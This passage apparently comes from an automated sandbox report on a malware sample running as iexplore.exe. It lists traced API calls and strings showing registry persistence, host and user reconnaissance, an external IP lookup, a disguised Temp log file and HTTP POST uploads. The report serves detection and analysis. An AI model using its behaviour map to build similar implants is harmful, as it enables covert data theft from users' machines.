      • Part of subcall function 00516239: SetThreadPriority.KERNEL32(00000000), ref: 005163A2
      • Part of subcall function 00516239: SHChangeNotify.SHELL32(00000004,00000005,?,00000000), ref: 005163B4
      • Part of subcall function 00516239: ExitProcess.KERNEL32 ref: 005163BB
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • ??3@YAXPAX@Z.MSVCRT ref: 0051443D
    • ??3@YAXPAX@Z.MSVCRT ref: 0051444B
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
      • Part of subcall function 005149DD: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000000,00000000), ref: 00514A11
      • Part of subcall function 005149DD: memcpy.MSVCRT ref: 00514A35
      • Part of subcall function 005149DD: ??2@YAPAXI@Z.MSVCRT ref: 00514A3C
      • Part of subcall function 005149DD: ??3@YAXPAX@Z.MSVCRT ref: 00514A62
      • Part of subcall function 005149DD: WriteFile.KERNEL32(?,?,00000269,?,00000000), ref: 00514A7D
      • Part of subcall function 005149DD: CloseHandle.KERNEL32(?), ref: 00514A86
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd

    Control-flow Graph
    • Function 4f1000-4f120e (basic blocks 389-417; legend: Executed / Not Executed)
    APIs
    • memset.MSVCRT ref: 004F102B
    • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 004F1040
      • Part of subcall function 004F3337: _errno.MSVCRT ref: 004F334F
      • Part of subcall function 004F3337: _errno.MSVCRT ref: 004F3396
    • memset.MSVCRT ref: 004F109D
    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 004F10B0
    • GetShortPathNameA.KERNEL32(00000000,00000000,00000104), ref: 004F10D4
    • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020006,?), ref: 004F1130
    • memset.MSVCRT ref: 004F1162
    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 004F118A
    • RegSetValueExA.KERNEL32(?,?,00000000,00000001,00000000,00000001), ref: 004F11EE
    • RegCloseKey.ADVAPI32(?), ref: 004F11FA
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd

    Control-flow Graph

    APIs
      • Part of subcall function 0051663C: malloc.MSVCRT ref: 0051663D
    • WinHttpOpen.WINHTTP(Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;,00000000,00000000,00000000,00000000,00520130,0000001C,00517CB6,?,00000000,?), ref: 00517BA6
    • WinHttpConnect.WINHTTP(00000000,api.ipaddress.com,00000050,00000000), ref: 00517BC2
    • WinHttpOpenRequest.WINHTTP(00000000,GET,/myip?format=txt,00000000,00000000,00000000,00000000), ref: 00517BDE
    • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00517BF4
    • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00517C00
    • WinHttpQueryDataAvailable.WINHTTP(00000000,00000000), ref: 00517C0F
    • WinHttpReadData.WINHTTP(00000000,?,00000020,?), ref: 00517C23
    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00517C30
    • WinHttpCloseHandle.WINHTTP(?), ref: 00517C35
    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00517C38
      • Part of subcall function 00517C51: WinHttpCloseHandle.WINHTTP(?,00517C46), ref: 00517C59
      • Part of subcall function 00517C51: WinHttpCloseHandle.WINHTTP(?,00517C46), ref: 00517C67
      • Part of subcall function 00517C51: WinHttpCloseHandle.WINHTTP(?,00517C46), ref: 00517C75
    Strings
    • api.ipaddress.com, xrefs: 00517BBC
    • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;, xrefs: 00517BA1
    • GET, xrefs: 00517BD8
    • /myip?format=txt, xrefs: 00517BD3
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd

    Control-flow Graph

    APIs
    • memset.MSVCRT ref: 00518179
    • GetLocalTime.KERNEL32(?,?,?,?), ref: 00518188
    • ___swprintf_l.LIBCMT ref: 005181D0
      • Part of subcall function 0051A5CC: _errno.MSVCRT ref: 0051A5D9
      • Part of subcall function 0051A5CC: _errno.MSVCRT ref: 0051A619
      • Part of subcall function 0051A5CC: _errno.MSVCRT ref: 0051A650
    • memset.MSVCRT ref: 0051821C
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000C800,00000000,00000000), ref: 00518239
    • CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 0051825C
    • GetFileSize.KERNEL32(00000000,00000000), ref: 0051826B
    • SetEndOfFile.KERNEL32(00000000), ref: 00518280
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0051828D
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005182CB
    • CloseHandle.KERNEL32(00000000), ref: 005182D2
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp, xrefs: 00518257
    • [%d-%d-%d %2d:%2d:%2d] , xrefs: 005181BE
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd

    Control-flow Graph
    • Function 517694-5177aa (basic blocks 455-477; legend: Executed / Not Executed)
    APIs
      • Part of subcall function 0051663C: malloc.MSVCRT ref: 0051663D
    • ___swprintf_l.LIBCMT ref: 005176D9
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005176EC
    • Process32FirstW.KERNEL32(00000000,?), ref: 00517705
    • realloc.MSVCRT ref: 00517755
    • ___swprintf_l.LIBCMT ref: 00517770
    • Process32NextW.KERNEL32(?,?), ref: 0051777F
    • CloseHandle.KERNEL32(?), ref: 0051778B
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd

    Control-flow Graph
    • Function 51327c-513369 (basic blocks 478-496; legend: Executed / Not Executed)
    APIs
    • memset.MSVCRT ref: 005132A2
    • __swprintf_c_l.LIBCMT ref: 005132B8
    • WinHttpAddRequestHeaders.WINHTTP(?,?,?,A0000000,?,?,?,?,?,?,?,00000000), ref: 005132E1
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 005132EB
    • WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0051330B
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00513315
    • WinHttpWriteData.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00513331
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0051333B
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Strings
    • Content-Length: %d, xrefs: 005132AB
    • POST WinHttpSendRequest failed! - %d, xrefs: 0051331C
    • WinHttpAddRequestHeaders 'Content-Length' add failed! - %d, xrefs: 005132F2
    • WinHttpWriteData failed! - %d, xrefs: 00513342
    • WinHttpWriteData Imcomplete!, xrefs: 0051334E
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 00518001
    • GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
    • ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 0051A4F3: _errno.MSVCRT ref: 0051A500
      • Part of subcall function 0051A4F3: _errno.MSVCRT ref: 0051A540
      • Part of subcall function 0051A4F3: _errno.MSVCRT ref: 0051A574
    • CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
    • GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
    • SetEndOfFile.KERNEL32(00000000), ref: 005180CC
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
    • CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • [%d-%d-%d %2d:%2d:%2d] , xrefs: 00518046
    • C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp, xrefs: 005180A7
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
      • Part of subcall function 0051663C: malloc.MSVCRT ref: 0051663D
      • Part of subcall function 00517694: ___swprintf_l.LIBCMT ref: 005176D9
      • Part of subcall function 00517694: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005176EC
      • Part of subcall function 00517694: Process32FirstW.KERNEL32(00000000,?), ref: 00517705
      • Part of subcall function 00517694: realloc.MSVCRT ref: 00517755
      • Part of subcall function 00517694: ___swprintf_l.LIBCMT ref: 00517770
      • Part of subcall function 00517694: Process32NextW.KERNEL32(?,?), ref: 0051777F
      • Part of subcall function 00517694: CloseHandle.KERNEL32(?), ref: 0051778B
      • Part of subcall function 005177AB: ??2@YAPAXI@Z.MSVCRT ref: 005177C2
      • Part of subcall function 005177AB: GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 005177D3
      • Part of subcall function 005177AB: ??3@YAXPAX@Z.MSVCRT ref: 005177E0
      • Part of subcall function 005177AB: ??2@YAPAXI@Z.MSVCRT ref: 005177E8
      • Part of subcall function 005177AB: GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 005177F7
      • Part of subcall function 005177AB: ??3@YAXPAX@Z.MSVCRT ref: 00517809
      • Part of subcall function 005177AB: ___swprintf_l.LIBCMT ref: 00517830
      • Part of subcall function 005177AB: realloc.MSVCRT ref: 00517875
      • Part of subcall function 005177AB: ___swprintf_l.LIBCMT ref: 005178C8
      • Part of subcall function 005177AB: ___swprintf_l.LIBCMT ref: 005178FB
      • Part of subcall function 005177AB: realloc.MSVCRT ref: 00517949
      • Part of subcall function 005177AB: ___swprintf_l.LIBCMT ref: 00517980
      • Part of subcall function 005177AB: realloc.MSVCRT ref: 005179A8
      • Part of subcall function 005177AB: ___swprintf_l.LIBCMT ref: 005179D6
      • Part of subcall function 005177AB: ??3@YAXPAX@Z.MSVCRT ref: 00517A07
      • Part of subcall function 00517A1E: memset.MSVCRT ref: 00517A4A
      • Part of subcall function 00517A1E: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000010,00000000), ref: 00517A5D
      • Part of subcall function 00517A1E: _findfirst.MSVCRT ref: 00517A87
      • Part of subcall function 00517A1E: realloc.MSVCRT ref: 00517B03
      • Part of subcall function 00517A1E: ___swprintf_l.LIBCMT ref: 00517B2A
      • Part of subcall function 00517A1E: _findnext.MSVCRT ref: 00517B53
      • Part of subcall function 00517B78: WinHttpOpen.WINHTTP(Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;,00000000,00000000,00000000,00000000,00520130,0000001C,00517CB6,?,00000000,?), ref: 00517BA6
      • Part of subcall function 00517B78: WinHttpConnect.WINHTTP(00000000,api.ipaddress.com,00000050,00000000), ref: 00517BC2
      • Part of subcall function 00517B78: WinHttpOpenRequest.WINHTTP(00000000,GET,/myip?format=txt,00000000,00000000,00000000,00000000), ref: 00517BDE
      • Part of subcall function 00517B78: WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00517BF4
      • Part of subcall function 00517B78: WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00517C00
      • Part of subcall function 00517B78: WinHttpQueryDataAvailable.WINHTTP(00000000,00000000), ref: 00517C0F
      • Part of subcall function 00517B78: WinHttpReadData.WINHTTP(00000000,?,00000020,?), ref: 00517C23
      • Part of subcall function 00517B78: WinHttpCloseHandle.WINHTTP(00000000), ref: 00517C30
      • Part of subcall function 00517B78: WinHttpCloseHandle.WINHTTP(?), ref: 00517C35
      • Part of subcall function 00517B78: WinHttpCloseHandle.WINHTTP(00000000), ref: 00517C38
      • Part of subcall function 00517535: GetSystemInfo.KERNELBASE(00000000,80000002,?,?,00000000,00020019,00000340), ref: 00517672
    • GlobalMemoryStatusEx.KERNELBASE(00000000,?,00000000,?), ref: 00517CCD
      • Part of subcall function 00516653: free.MSVCRT(00000000,00513A3A), ref: 0051665E
      • Part of subcall function 00517143: LoadLibraryA.KERNEL32(Netapi32), ref: 00517177
      • Part of subcall function 00517143: GetProcAddress.KERNELBASE(00000000), ref: 0051717E
      • Part of subcall function 00517143: LoadLibraryA.KERNEL32(Netapi32), ref: 00517197
      • Part of subcall function 00517143: GetProcAddress.KERNEL32(00000000), ref: 0051719E
      • Part of subcall function 00517143: memset.MSVCRT ref: 005171B2
      • Part of subcall function 00517143: GetUserNameA.ADVAPI32(000001D0,?), ref: 005171CE
      • Part of subcall function 00517143: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000040), ref: 005171F2
      • Part of subcall function 00517143: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000210,00000040,00000000,00000000), ref: 0051725E
      • Part of subcall function 00517143: ConvertSidToStringSidA.ADVAPI32(?,?), ref: 0051726E
      • Part of subcall function 00516DF6: GetLocaleInfoA.KERNEL32(00000400,00000059,00000298,00000010,00000000,00000040,00000000), ref: 00516E2D
      • Part of subcall function 00516DF6: GetLocaleInfoA.KERNEL32(00000400,0000005A,000002A8,00000010), ref: 00516E4F
      • Part of subcall function 00516DF6: __swprintf_c_l.LIBCMT ref: 0051710B
      • Part of subcall function 00516D52: GetModuleHandleW.KERNEL32(kernel32,GetDiskFreeSpaceExW,00000040,?,?,00517D23,00000000,00000000), ref: 00516D70
      • Part of subcall function 00516D52: GetProcAddress.KERNEL32(00000000,?,?,00517D23,00000000,00000000), ref: 00516D77
      • Part of subcall function 00516D52: GetTempPathW.KERNEL32(00000104,00000000), ref: 00516D98
      • Part of subcall function 00516D52: GetDiskFreeSpaceExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00517D23,00000000,00000000), ref: 00516DAD
      • Part of subcall function 005166E9: IsWow64Process.KERNELBASE(000000FF,00000340,?,?,?,005168F0,?,?,?,00000340,00000000), ref: 005166F4
      • Part of subcall function 005166E9: GetNativeSystemInfo.KERNEL32(?), ref: 005166FE
      • Part of subcall function 005165A8: _vsnprintf.MSVCRT ref: 005165D1
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 005148B7
    • SHGetSpecialFolderPathA.SHELL32(00000000,-0000D007,0000001C,00000000), ref: 005148C4
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
    • CreateDirectoryA.KERNELBASE(-0000D007,00000000), ref: 005148E1
    • CreateDirectoryA.KERNELBASE(-0000D007,00000000), ref: 005148F5
    • CreateDirectoryA.KERNELBASE(-0000D007,00000000), ref: 00514909
    • ___swprintf_l.LIBCMT ref: 0051493E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 00517A4A
    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000010,00000000), ref: 00517A5D
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
    • _findfirst.MSVCRT ref: 00517A87
    • realloc.MSVCRT ref: 00517B03
    • ___swprintf_l.LIBCMT ref: 00517B2A
    • _findnext.MSVCRT ref: 00517B53
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 00514583
    • GetLocalTime.KERNEL32(?,00000000,?,00000000), ref: 005145A6
      • Part of subcall function 0051841D: memset.MSVCRT ref: 00518446
    • GetNativeSystemInfo.KERNEL32(?), ref: 005145EB
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
    • memset.MSVCRT ref: 00514681
      • Part of subcall function 00512B8D: memset.MSVCRT ref: 00512BBC
      • Part of subcall function 00512B8D: wcsstr.MSVCRT ref: 00512BEA
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
    • memset.MSVCRT ref: 005146BC
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,000000AF,00000000,00000000), ref: 005146DB
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A476: memcpy.MSVCRT ref: 0051A4BB
      • Part of subcall function 0051A476: memset.MSVCRT ref: 0051A4CC
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A4DE
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 00512208
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
    • wcsstr.MSVCRT ref: 0051222A
    • _wtoi.MSVCRT ref: 0051223B
    • WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
    • GetLastError.KERNEL32(?,?,00000000), ref: 00512284
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 0051280C: memset.MSVCRT ref: 0051284B
      • Part of subcall function 0051280C: rand.MSVCRT ref: 00512862
      • Part of subcall function 0051280C: WinHttpOpenRequest.WINHTTP(?,GET,?,00000000,00000000,00000000,-002EDD5D,?,00000000,00000000,?,00000000), ref: 005128D5
      • Part of subcall function 0051280C: GetLastError.KERNEL32 ref: 005128E5
      • Part of subcall function 0051280C: WinHttpSetOption.WINHTTP(00000000,00000006,?,00000004), ref: 0051291B
      • Part of subcall function 0051280C: WinHttpQueryOption.WINHTTP(?,0000001F,?,?), ref: 00512949
      • Part of subcall function 0051280C: WinHttpSetOption.WINHTTP(?,0000001F,00003300,00000004), ref: 0051296A
      • Part of subcall function 0051280C: WinHttpSetOption.WINHTTP(?,0000002F,00000000,00000000), ref: 00512972
      • Part of subcall function 0051280C: memset.MSVCRT ref: 0051298A
      • Part of subcall function 0051280C: ___swprintf_l.LIBCMT ref: 005129A7
      • Part of subcall function 0051280C: WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 005129E0
      • Part of subcall function 0051280C: GetLastError.KERNEL32 ref: 005129E6
      • Part of subcall function 0051280C: memset.MSVCRT ref: 00512A0D
      • Part of subcall function 0051280C: ___swprintf_l.LIBCMT ref: 00512A35
      • Part of subcall function 0051280C: WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512A63
      • Part of subcall function 0051280C: GetLastError.KERNEL32 ref: 00512A69
      • Part of subcall function 0051280C: ___swprintf_l.LIBCMT ref: 00512A8D
      • Part of subcall function 0051280C: WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512ABB
      • Part of subcall function 0051280C: GetLastError.KERNEL32 ref: 00512AC1
      • Part of subcall function 0051280C: WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512B0D
      • Part of subcall function 0051280C: GetLastError.KERNEL32 ref: 00512B13
      • Part of subcall function 0051280C: WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512B5F
      • Part of subcall function 0051280C: GetLastError.KERNEL32 ref: 00512B65
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • WinHttpConnect failed! - %d, xrefs: 0051228B
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000000,00000000), ref: 00514A11
    • memcpy.MSVCRT ref: 00514A35
    • ??2@YAPAXI@Z.MSVCRT ref: 00514A3C
      • Part of subcall function 0051841D: memset.MSVCRT ref: 00518446
    • ??3@YAXPAX@Z.MSVCRT ref: 00514A62
    • WriteFile.KERNEL32(?,?,00000269,?,00000000), ref: 00514A7D
    • CloseHandle.KERNEL32(?), ref: 00514A86
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • Ss)4:WKsRr(3/VJrQq&2.UIqPp%1-THp, xrefs: 00514A44
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 004F16EA
    • GetModuleHandleA.KERNEL32(?,?,00000000,00000000), ref: 004F171B
    • GetLastError.KERNEL32(?,00000000,00000000), ref: 004F1728
    • LoadLibraryExA.KERNELBASE(?,00000000,00000008,?,00000000,00000000), ref: 004F1736
    • GetProcAddress.KERNEL32(?,00000000,?,00000000,00000000), ref: 004F176C
    • GetProcAddress.KERNEL32(?,?,?,00000000,00000000), ref: 004F178C
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
